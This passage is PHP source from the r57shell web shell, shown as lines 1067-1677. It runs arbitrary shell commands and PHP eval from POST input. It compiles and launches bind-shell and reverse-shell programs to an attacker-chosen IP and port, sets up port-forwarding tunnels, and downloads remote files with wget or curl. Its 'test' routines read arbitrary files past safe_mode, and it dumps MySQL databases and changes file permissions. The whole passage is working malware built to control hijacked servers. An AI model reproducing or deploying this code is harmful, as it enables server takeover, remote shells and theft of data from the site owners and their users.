1067echo "<br>".ws(2);
1068echo "Disable functions : <b>";
1069$df = @ini_get('disable_functions');
1070if(empty($df)) echo "NONE</b>"; else echo "$df</b>";
1071$free = @diskfreespace($dir);
1072if (!$free) {$free = 0;}
1073$all = @disk_total_space($dir);
1074if (!$all) {$all = 0;}
1075$used = $all-$free;
1076$used_percent = @round(100/($all/$free),2);
1077echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
1078echo '</font></td></tr><table>
1079<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1080<tr><td align=right width=100>';
1081//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1082/* display information */
1083echo $font;
1084if(!$windows){
1085echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1086echo "</td><td>";
1087echo "<font face=Verdana size=-2 color=red><b>";
1088$uname = ex('uname -a');
1089echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1090if(!$safe_mode){
1091$bsd1 = ex('/sbin/sysctl -n kern.ostype');
1092$bsd2 = ex('/sbin/sysctl -n kern.osrelease');
1093$lin1 = ex('/sbin/sysctl -n kernel.ostype');
1094$lin2 = ex('/sbin/sysctl -n kernel.osrelease');
1095}
1096if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
1097else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
1098else { $sysctl = "-"; }
1099echo ws(3).$sysctl."<br>";
1100echo ws(3).ex('echo $OSTYPE')."<br>";
1101echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1102$id = ex('id');
1103echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
1104echo ws(3).$dir;
1105echo "</b></font>";
1106}
1107else
1108{
1109echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1110echo "</td><td>";
1111echo "<font face=Verdana size=-2 color=red><b>";
1112echo ws(3).@substr(@php_uname(),0,120)."<br>";
1113echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1114echo ws(3).@get_current_user()."<br>";
1115echo ws(3).$dir."<br>";
1116echo "</font>";
1117}
1118echo "</font>";
1119echo "</td></tr></table>";
1120if(empty($c1)||empty($c2)) { die(); }
1121$f = '<br>';
1122$f = base64_decode($c1);
1123$f .= base64_decode($c2);
1124//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1125/* find text */
1126if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
1127{
1128$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1129}
1130//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1131//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1132/* chmod/chown/chgrp */
1133if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
1134 {
1135 switch($_POST['what'])
1136 {
1137 case 'own':
1138 @chown($_POST['param1'],$_POST['param2']);
1139 break;
1140
1141 case 'grp':
1142 @chgrp($_POST['param1'],$_POST['param2']);
1143 break;
1144
1145 case 'mod':
1146 @chmod($_POST['param1'],intval($_POST['param2'], 8));
1147 break;
1148 }
1149 $_POST['cmd']="";
1150 }
1151//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1152/* make */
1153if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
1154 {
1155 switch($_POST['what'])
1156 {
1157 case 'file':
1158 if($_POST['action'] == "create")
1159 {
1160 if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
1161 else {
1162 fclose($file);
1163 $_POST['e_name'] = $_POST['mk_name'];
1164 $_POST['cmd']="edit_file";
1165 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1166 }
1167 }
1168 else if($_POST['action'] == "delete")
1169 {
1170 if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1171 $_POST['cmd']="";
1172 }
1173 break;
1174
1175 case 'dir':
1176 if($_POST['action'] == "create"){
1177 if(mkdir($_POST['mk_name']))
1178 {
1179 $_POST['cmd']="";
1180 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1181 }
1182 else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
1183 }
1184 else if($_POST['action'] == "delete"){
1185 if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1186 $_POST['cmd']="";
1187 }
1188 break;
1189 }
1190 }
1191//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1192/* edit file */
1193if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
1194 {
1195 if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
1196 if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
1197 else {
1198 echo $table_up3;
1199 echo $font;
1200 echo "<form name=save_file method=post>";
1201 echo ws(3)."<b>".$_POST['e_name']."</b>";
1202 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
1203 echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
1204 fclose($file);
1205 echo "</textarea>";
1206 echo "<input type=hidden name=e_name size=85 value=".$_POST['e_name'].">";
1207 echo "<input type=hidden name=dir value=".$dir.">";
1208 echo "<input type=hidden name=cmd size=85 value=save_file>";
1209 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
1210 echo "</div>";
1211 echo "</font>";
1212 echo "</form>";
1213 echo "</td></tr></table>";
1214 exit();
1215 }
1216 }
1217//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1218/* save file */
1219if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
1220 {
1221 if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
1222 else {
1223 @fwrite($file,$_POST['e_text']);
1224 @fclose($file);
1225 $_POST['cmd']="";
1226 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
1227 }
1228 }
1229//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1230/* port bind C */
1231if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
1232{
1233 cf("/tmp/bd.c",$port_bind_bd_c);
1234 $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
1235 @unlink("/tmp/bd.c");
1236 $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
1237 $_POST['cmd']="ps -aux | grep bd";
1238}
1239//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1240/* port bind Perl */
1241if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
1242{
1243 cf("/tmp/bdpl",$port_bind_bd_pl);
1244 $p2=which("perl");
1245 if(empty($p2)) $p2="perl";
1246 $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
1247 $_POST['cmd']="ps -aux | grep bdpl";
1248}
1249//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1250/* back connect Perl */
1251if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
1252{
1253 cf("/tmp/back",$back_connect);
1254 $p2=which("perl");
1255 if(empty($p2)) $p2="perl";
1256 $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
1257 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1258}
1259//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1260/* back connect C */
1261if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
1262{
1263 cf("/tmp/back.c",$back_connect_c);
1264 $blah = ex("gcc -o /tmp/backc /tmp/back.c");
1265 @unlink("/tmp/back.c");
1266 $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
1267 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1268}
1269//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1270/* datapipe perl */
1271if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
1272{
1273 cf("/tmp/dp",$datapipe_pl);
1274 $p2=which("perl");
1275 if(empty($p2)) $p2="perl";
1276 $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
1277 $_POST['cmd']="ps -aux | grep dp";
1278}
1279//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1280/* datapipe C */
1281if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
1282{
1283 cf("/tmp/dpc.c",$datapipe_c);
1284 $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
1285 @unlink("/tmp/dpc.c");
1286 $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
1287 $_POST['cmd']="ps -aux | grep dpc";
1288}
1289//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1290/* alias execute */
1291if (!empty($_POST['alias']))
1292 {
1293 foreach ($aliases as $alias_name=>$alias_cmd) {
1294 if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
1295 }
1296 }
1297//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1298/* file upload */
1299if (!empty($HTTP_POST_FILES['userfile']['name']))
1300{
1301if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
1302else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
1303@copy($HTTP_POST_FILES['userfile']['tmp_name'],
1304 $_POST['dir']."/".$nfn)
1305 or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
1306}
1307//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1308/* file upload from remote host */
1309if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
1310{
1311 switch($_POST['with'])
1312 {
1313 case wget:
1314 $p2=which("wget");
1315 if(empty($p2)) $p2="wget";
1316 $_POST['cmd'] = $p2." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
1317 break;
1318
1319 case fetch:
1320 $p2=which("fetch");
1321 if(empty($p2)) $p2="fetch";
1322 $_POST['cmd']= $p2." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1323 break;
1324
1325 case lynx:
1326 $p2=which("lynx");
1327 if(empty($p2)) $p2="lynx";
1328 $_POST['cmd']= $p2." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1329 break;
1330
1331 case links:
1332 $p2=which("links");
1333 if(empty($p2)) $p2="links";
1334 $_POST['cmd']= $p2." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1335 break;
1336
1337 case GET:
1338 $p2=which("GET");
1339 if(empty($p2)) $p2="GET";
1340 $_POST['cmd']= $p2." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1341 break;
1342
1343 case curl:
1344 $p2=which("curl");
1345 if(empty($p2)) $p2="curl";
1346 $_POST['cmd']= $p2." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1347 break;
1348 }
1349}
1350//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1351/* command execute */
1352echo $table_up3;
1353if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
1354else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
1355echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
1356echo "<b>";
1357echo "<div align=center><textarea name=report cols=121 rows=15>";
1358
1359// safe_mode On
1360if($safe_mode)
1361{
1362 switch($_POST['cmd'])
1363 {
1364 case 'safe_dir': // dir listing
1365 $d=@dir($dir);
1366 if ($d)
1367 {
1368 while (false!==($file=$d->read()))
1369 {
1370 if ($file=="." || $file=="..") continue;
1371 @clearstatcache();
1372 list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
1373 if($windows){ // WINDOWS STYLE
1374 echo date("d.m.Y H:i",$mtime);
1375 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
1376 }
1377 else{ // UNIX STYLE
1378 $owner = @posix_getpwuid($uid);
1379 $grgid = @posix_getgrgid($gid);
1380 echo $inode." ";
1381 echo perms(@fileperms($file));
1382 printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
1383 echo date("d.m.Y H:i ",$mtime);
1384 }
1385 echo "$file\n";
1386 }
1387 $d->close();
1388 }
1389 else echo $lang[$language._text29];
1390 break;
1391
1392 case 'safe_file':
1393 if(@is_file($_POST['file']))
1394 {
1395 $file = @file($_POST['file']);
1396 if($file)
1397 {
1398 $c = @sizeof($file);
1399 for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
1400 }
1401 else echo $lang[$language._text29];
1402 }
1403 else echo $lang[$language._text31];
1404 break;
1405
1406 case 'test1':
1407 $ci = @curl_init("file://".$_POST['test1_file']."");
1408 $cf = @curl_exec($ci);
1409 echo $cf;
1410 break;
1411
1412 case 'test2':
1413 include($_POST['test2_file']);
1414 break;
1415
1416 case 'test3':
1417 $db = @mysql_connect('localhost',$_POST['test3_ml'],$_POST['test3_mp']);
1418 if($db)
1419 {
1420 if(@mysql_select_db($_POST['test3_md'],$db))
1421 {
1422 $sql = "DROP TABLE IF EXISTS temp_r57_table;";
1423 @mysql_query($sql);
1424 $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
1425 @mysql_query($sql);
1426 $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
1427 @mysql_query($sql);
1428 $sql = "SELECT * FROM temp_r57_table;";
1429 $r = @mysql_query($sql);
1430 while($r_sql = @mysql_fetch_array($r)) { echo @htmlspecialchars($r_sql[0]); }
1431 $sql = "DROP TABLE IF EXISTS temp_r57_table;";
1432 @mysql_query($sql);
1433 }
1434 else echo "[-] ERROR! Can't select database";
1435 @mysql_close($db);
1436 }
1437 else echo "[-] ERROR! Can't connect to mysql server";
1438 break;
1439 } // end : switch($_POST['cmd'])
1440
1441} // end : if($safe_mode)
1442
1443// safe_mode Off
1444else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump"))
1445{
1446 $cmd_rep = ex($_POST['cmd']);
1447 if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
1448 else { echo @htmlspecialchars($cmd_rep)."\n"; }
1449
1450
1451}
1452
1453// íå çàâèñèò îò ñåéôà
1454if ($_POST['cmd']=="php_eval")
1455 {
1456 $eval = @str_replace("<?","",$_POST['php_eval']);
1457 $eval = @str_replace("?>","",$eval);
1458 @eval($eval);
1459 }
1460//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1461/* mysql äàìï */
1462if ($_POST['cmd']=="mysql_dump")
1463 {
1464 if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
1465 if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
1466 $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
1467 if($db)
1468 {
1469
1470 if(@mysql_select_db($_POST['mysql_db'],$db))
1471 {
1472 // èíôà î äàìïå
1473 $sql1 = "# MySQL dump created by r57shell\r\n";
1474 $sql1 .= "# homepage: http://rst.void.ru\r\n";
1475 $sql1 .= "# ---------------------------------\r\n";
1476 $sql1 .= "# date : ".date ("j F Y g:i")."\r\n";
1477 $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
1478 $sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n";
1479 $sql1 .= "# ---------------------------------\r\n\r\n";
1480
1481 // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû
1482 $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
1483 $row = @mysql_fetch_row($res);
1484 $sql1 .= $row[1]."\r\n\r\n";
1485 $sql1 .= "# ---------------------------------\r\n\r\n";
1486
1487 $sql2 = '';
1488
1489 // ïîëó÷àåì äàííûå òàáëèöû
1490 $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
1491 if (@mysql_num_rows($res) > 0) {
1492 while ($row = @mysql_fetch_assoc($res)) {
1493 $keys = @implode("`, `", @array_keys($row));
1494 $values = @array_values($row);
1495 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
1496 $values = @implode("', '", $values);
1497 $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
1498 }
1499 $sql2 .= "\r\n# ---------------------------------";
1500 }
1501 // ïèøåì â ôàéë èëè âûâîäèì â áðàóçåð
1502 if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
1503 else { echo $sql1.$sql2; }
1504 } // end if(@mysql_select_db($_POST['mysql_db'],$db))
1505
1506 else echo "[-] ERROR! Can't select database";
1507 @mysql_close($db);
1508 } // end if($db)
1509 else echo "[-] ERROR! Can't connect to mysql server";
1510 } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
1511 else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
1512 } // end if ($_POST['cmd']=="mysql_dump")
1513
1514echo "</textarea></div>";
1515echo "</b>";
1516echo "</td></tr></table>";
1517//////// start table
1518echo "<table width=100% cellpadding=0 cellspacing=0>";
1519//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1520/* command execute form */
1521if(!$safe_mode){
1522echo "<form name=command method=post>";
1523echo $table_up1; echo $lang[$language.'_text2']; echo $table_up2;
1524echo $font;
1525echo "<b>".ws(1).$lang[$language.'_text3'].$arrow.ws(4)."</b>";
1526echo "<input type=text name=cmd size=85>".ws(2)."<br>";
1527echo "<b>".ws(1).$lang[$language.'_text4'].$arrow.ws(4)."</b>";
1528echo "<input type=text name=dir size=85 value=".$dir.">";
1529echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
1530echo "</font>";
1531echo $table_end1;
1532echo "</form>";
1533}
1534//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1535/* safe_mode form */
1536if($safe_mode){
1537echo "<form name=safe_ls method=post>";
1538echo $table_up1; echo $lang[$language.'_text28']; echo $table_up2;
1539echo $font;
1540// dir
1541echo "<b>".ws(1).$lang[$language.'_text4'].$arrow.ws(4)."</b>";
1542echo "<input type=text name=dir size=85 value=".$dir.">";
1543echo "<input type=hidden name=cmd size=85 value=safe_dir>";
1544echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt6']." \"></form>";
1545echo "<form name=safe_cat method=post>";
1546echo "<b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
1547echo "<input type=text name=file size=85 value=".$dir.">";
1548echo "<input type=hidden name=cmd size=85 value=safe_file>";
1549echo "<input type=hidden name=dir value=".$dir.">";
1550echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt7']." \"></font>";
1551echo $table_end1;
1552echo "</form>";
1553}
1554//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1555/* edit_file form */
1556echo "<form name=edit_file method=post>";
1557echo $table_up1; echo $lang[$language.'_text42']; echo $table_up2;
1558// dir
1559echo $font;
1560echo "<b>".$lang[$language.'_text43'].$arrow.ws(4)."</b>";
1561echo "<input type=text name=e_name size=85 value=";
1562echo (!empty($_POST['e_name'])?($_POST['e_name']):($dir));
1563echo ">";
1564echo "<input type=hidden name=cmd size=85 value=edit_file>";
1565echo "<input type=hidden name=dir value=".$dir.">";
1566echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt11']." \">";
1567echo "</font>";
1568echo $table_end1;
1569echo "</form>";
1570//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1571/* mk/del dir/file form */
1572if($safe_mode){
1573echo "<form name=mk method=post>";
1574echo $table_up1; echo $lang[$language.'_text57']; echo $table_up2;
1575// dir
1576echo $font;
1577echo ws(24)."<b>".$lang[$language.'_text58'].$arrow.ws(4)."</b>";
1578echo "<input type=text name=mk_name size=54 value=";
1579echo (!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"));
1580echo ">";
1581echo ws(2)."<select name=action>";
1582echo "<option value=create>".$lang[$language.'_text65']."</option>";
1583echo "<option value=delete>".$lang[$language.'_text66']."</option>";
1584echo "</select>";
1585echo ws(2)."<select name=what>";
1586echo "<option value=file>".$lang[$language.'_text59']."</option>";
1587echo "<option value=dir>".$lang[$language.'_text60']."</option>";
1588echo "</select>";
1589echo "<input type=hidden name=cmd size=85 value=mk>";
1590echo "<input type=hidden name=dir value=".$dir.">";
1591echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt13']." \">";
1592echo "</font>";
1593echo $table_end1;
1594echo "</form>";
1595}
1596//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1597/* change perm form */
1598if($safe_mode && $unix){
1599echo "<form name=ch method=post>";
1600echo $table_up1; echo $lang[$language.'_text67']; echo $table_up2;
1601// dir
1602echo $font;
1603echo ws(14)."<b>".$lang[$language.'_text69'].$arrow.ws(4)."</b>";
1604echo "<input type=text name=param1 size=40 value=";
1605echo (($_POST['param1'])?($_POST['param1']):("filename"));
1606echo ">";
1607echo ws(2)."<b>".$lang[$language.'_text70'].$arrow.ws(4)."</b>";
1608echo "<input type=text name=param2 size=26 value=";
1609echo (($_POST['param2'])?($_POST['param2']):("0777"));
1610echo " title='".$lang[$language.'_text71']."'><br>";
1611echo "<input type=hidden name=cmd size=85 value=ch_>";
1612echo "<input type=hidden name=dir value=".$dir.">";
1613echo ws(15)."<b>".$lang[$language.'_text68'].$arrow.ws(4)."</b>";
1614echo ws(2)."<select name=what>";
1615echo "<option value=mod>CHMOD</option>";
1616echo "<option value=own>CHOWN</option>";
1617echo "<option value=grp>CHGRP</option>";
1618echo "</select>";
1619echo ws(87)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
1620echo "</font>";
1621echo $table_end1;
1622echo "</form>";
1623}
1624//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1625/* aliases form */
1626if(!$safe_mode){
1627echo "<form name=aliases method=POST>";
1628echo $table_up1; echo $lang[$language.'_text7']; echo $table_up2;
1629echo $font;
1630echo "<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>";
1631echo "<select name=alias>";
1632foreach ($aliases as $alias_name=>$alias_cmd)
1633 {
1634 echo "<option>$alias_name</option>";
1635 }
1636 echo "</select>";
1637echo "<input type=hidden name=dir value=".$dir.">";
1638echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
1639echo "</font>";
1640echo $table_end1;
1641echo "</form>";
1642}
1643//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1644/* search text form */
1645echo "<form name=search_text method=post>";
1646echo $table_up1; echo $lang[$language.'_text54']; echo $table_up2;
1647echo $font;
1648echo ws(5)."<b>".$lang[$language.'_text52'].$arrow.ws(4)."</b>";
1649echo "<input type=text name=s_text size=85 value=\"text\"><br>";
1650echo ws(8)."<b>".$lang[$language.'_text53'].$arrow.ws(4)."</b>";
1651echo "<input type=text name=s_dir size=85 value=".$dir."> * ( /root;/home;/tmp )<br>";
1652echo ws(5)."<b>".$lang[$language.'_text55'].$arrow.ws(4)."</b>";
1653echo "<input type=checkbox name=m value=1 id=m>";
1654echo "<input type=text name=s_mask size=82 value=.txt;.php> * ( .txt;.php;.htm )";
1655echo "<input type=hidden name=cmd size=85 value=search_text>";
1656echo "<input type=hidden name=dir value=".$dir.">";
1657echo ws(1)."<br><div align=center><input type=submit name=submit value=\" ".$lang[$language.'_butt12']." \"></div>";
1658echo "</font>";
1659echo $table_end1;
1660echo "</form>";
1661//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1662/* search text with find form */
1663echo "<form name=search_text method=post>";
1664echo $table_up1; echo $lang[$language.'_text76']; echo $table_up2;
1665echo $font;
1666echo ws(5)."<b>".$lang[$language.'_text72'].$arrow.ws(4)."</b>";
1667echo "<input type=text name=s_text size=85 value=\"text\"><br>";
1668echo ws(8)."<b>".$lang[$language.'_text73'].$arrow.ws(4)."</b>";
1669echo "<input type=text name=s_dir size=85 value=".$dir."> * ( /root;/home;/tmp )<br>";
1670echo ws(6)."<b>".$lang[$language.'_text74'].$arrow.ws(4)."</b>";
1671echo "<input type=text name=s_mask size=85 value=*.[hc]>".ws(1).$lang[$language.'_text75'];
1672echo "<input type=hidden name=cmd size=85 value=find_text>";
1673echo "<input type=hidden name=dir value=".$dir.">";
1674echo ws(1)."<br><div align=center><input type=submit name=submit value=\" ".$lang[$language.'_butt12']." \"></div>";
1675echo "</font>";
1676echo $table_end1;
1677echo "</form>";
